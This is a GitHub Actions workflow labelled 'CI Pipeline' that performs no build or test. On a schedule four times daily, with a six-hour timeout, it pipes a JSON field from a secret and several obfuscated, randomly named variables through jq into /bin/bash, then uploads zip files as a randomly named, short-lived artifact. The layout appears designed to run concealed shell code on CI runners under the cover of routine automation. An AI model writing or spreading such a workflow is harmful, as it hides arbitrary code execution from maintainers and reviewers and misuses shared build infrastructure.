name: CI Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '13 5,11,17,23 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}-${{ github.ref }}
  cancel-in-progress: true
jobs:
  ci:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Launch
        env:
          w1: ${{ secrets.w1 }}
        run: |
          printf '%s' "$w1" | jq -r .ymm98397 | /bin/bash
          printf '%s' "$rfvg1196" | jq -r .c88 | /bin/bash
          printf '%s' "$igf065" | jq -r .hwflh58323 | /bin/bash
          printf '%s' "$zlweg19236" | jq -r .jjc26575 | /bin/bash
          printf '%s' "$rezax370" | jq -r .oer653 | /bin/bash
          echo $zgzrk09272 | jq -r .ut7 | /bin/bash

      - name: Save artifact
        uses: actions/upload-artifact@v4
        with:
          name: 2TPjimwg
          path: "*.zip"
          retention-days: 1
